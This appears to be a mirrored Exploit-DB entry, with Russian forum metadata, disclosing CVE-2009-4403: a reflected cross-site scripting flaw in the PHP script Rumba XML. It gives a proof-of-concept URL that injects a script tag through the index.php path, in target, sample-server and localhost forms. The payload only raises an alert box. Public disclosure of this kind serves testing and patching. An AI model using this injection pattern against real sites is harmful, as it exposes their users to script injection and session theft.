- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10534
- Проверка EDB
-
- Пройдено
- Автор
- HADI KIAMARSI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4403
- Дата публикации
- 2009-12-17
Код:
###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
#
###########################################
PoC :
http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>
example :
http://server/index.php/>"><script>alert('Hadi Kiamarsi')</script>
local Example :
http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>- Источник
- www.exploit-db.com
